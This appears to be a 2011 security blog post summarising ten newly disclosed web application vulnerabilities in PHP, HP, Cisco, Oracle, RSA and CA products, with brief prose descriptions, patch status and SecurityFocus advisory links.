Top Ten Web Application Vulnerabilities 4/18/2011 - 5/1/2011

1) PHP 'phar/tar.c' Heap Buffer Overflow Vulnerability

 

PHP is susceptible to a remote heap-based buffer overflow because it fails to adequately sanitize user-supplied input. Attackers can leverage this vulnerability to run arbitrary code in context of the PHP process, which may allow them to gain elevated privileges or bypass other security restrictions.  As of this writing a fix has not yet been released. Contact the vendor for additional information. 

 

http://www.securityfocus.com/bid/47545

 

2) HP ProLiant Support Pack Multiple Security Vulnerabilities

 

HP ProLiant Support Pack is susceptible to multiple vulnerabilities including Cross-Site Scripting, information disclosure, and URI Redirection.  An attacker could leverage these vulnerabilities to steal authentication credentials,  redirect users to malicious sites, or gain access to information which could help formulate more damaging attacks. Updates which resolve these issues are available. Contact the vendor for more details.

 

http://www.securityfocus.com/bid/47510

 

3) HP Systems Insight Manager Cross-Site Scripting/Cross-Site Request Forgery

 

HP Systems Insight Manager is susceptible to multiple vulnerabilities including Cross-Site Scripting and Cross-Site Request Forgery. If exploited, these vulnerabilities could lead to the theft of confidential information and authentication credentials, execution of malicious scripts in the browsers of unsuspecting users, or abuse of the trust a web application places in a user. Updates which resolve these vulnerabilities are available. Contact the vendor for further information.

 

http://www.securityfocus.com/bid/47511
http://www.securityfocus.com/bid/47513

 

4) Cisco Unified Communications Manager  SQL Injection /Directory Traversal Vulnerabilities

 

Cisco Unified Communications Manager  is susceptible to several vulnerabilities including SQL Injection and Directory Traversal. SQL Injection can give an attacker full access to a backend database, and in certain circumstances can be utilized to take complete control of a system. An attacker can leverage Directory Traversal to write arbitrary files to locations outside of the application's current directory.  Updates which resolve these issues are available. Contact the vendor for more details.

 

http://www.securityfocus.com/bid/47605
http://www.securityfocus.com/bid/47608

 

5) Oracle JD Edwards EnterpriseOne Multiple Cross-Site Scripting Vulnerabilities

 

Oracle JD Edwards EnterpriseOne  is susceptible to multiple Cross-Site Scripting vulnerabilities. Cross-Site Scripting can be exploited to execute code in the browser of an unsuspecting user and steal cookie-based authentication credentials. Updates which resolve these vulnerabilities are available. Contact the vendor for additional information.

 

http://www.securityfocus.com/bid/47479

 

6) HP SiteScope Cross-Site Scripting/ HTML Injection Vulnerabilities

 

HP SiteScope is susceptible to Cross-Site Scripting and HTML Injection vulnerabilities. Successful exploitation of these vulnerabilities could be used to alter how the site appears, steal authentication credentials, or execute malicious scripts in the browsers of unsuspecting users. Updates which resolve these vulnerabilities are available. Contact the vendor for more details.

 

http://www.securityfocus.com/bid/47554

 

7) RSA Data Loss Prevention (DLP) Enterprise Manager Cross-Site Scripting Vulnerability

 

RSA Data Loss Prevention (DLP) Enterprise Manager is susceptible to Cross-Site Scripting. An attacker can leverage Cross-Site Scripting to execute script code in the browsers of unsuspecting users in context of the affected application, possibly leading to theft of authentication credentials and other attacks. Updates which resolve this issue are available. Contact the vendor for additional details.

 

http://www.securityfocus.com/bid/47642

 

8) Oracle Sun GlassFish/Java System Application Server Remote Authentication Bypass Vulnerability

 

Oracle Sun GlassFish/Java System Application Server is susceptible to a remote authentication bypass vulnerability which could allow an attacker to bypass authentication and perform unauthorized actions. Updates which resolve this issue are available. Contact the vendor for further details.

 

http://www.securityfocus.com/bid/47438

 

9) CA Arcot WebFort Versatile Authentication Server Cross-Site Scripting/URI Redirection Vulnerabilities

 

CA Arcot WebFort Versatile Authentication Server is susceptible to Cross-Site Scripting and URI Redirection vulnerabilities. Arbitrary script code can be executed in context of the affected site in the browsers of unsuspecting users if Cross-Site Scripting  is successfully exploited.  Successful exploitation of the URI Redirection vulnerability could give an attacker the means to redirect users to malicious sites, aiding in phishing attacks.  Updates which resolve these issuse are available. Contact the vendor for more information.

 

http://www.securityfocus.com/bid/47587
http://www.securityfocus.com/bid/47588

 

10) HP Insight Control Cross-Site Request Forgery

 

HP Insight Control is susceptible to Cross-Site Request Forgery. Cross-Site Request Forgery leverages the trust a web application places in a user to make authenticated requests to a target site for which the user is logged in, and can be used to abuse any type of functionality the target web application contains.  Updates which resolve this vulnerability are available. Contact the vendor for additional information.

 

http://www.securityfocus.com/bid/47524

Leave a Comment

We encourage you to share your comments on this post. Comments are moderated and will be reviewed
and posted as promptly as possible during regular business hours

To ensure your comment is published, be sure to follow the Community Guidelines.

Be sure to enter a unique name. You can't reuse a name that's already in use.
Be sure to enter a unique email address. You can't reuse an email address that's already in use.
Type the characters you see in the picture above.Type the words you hear.
Search
Showing results for 
Search instead for 
Do you mean 
About the Author
Featured


Follow Us
The opinions expressed above are the personal opinions of the authors, not of HP. By using this site, you accept the Terms of Use and Rules of Participation.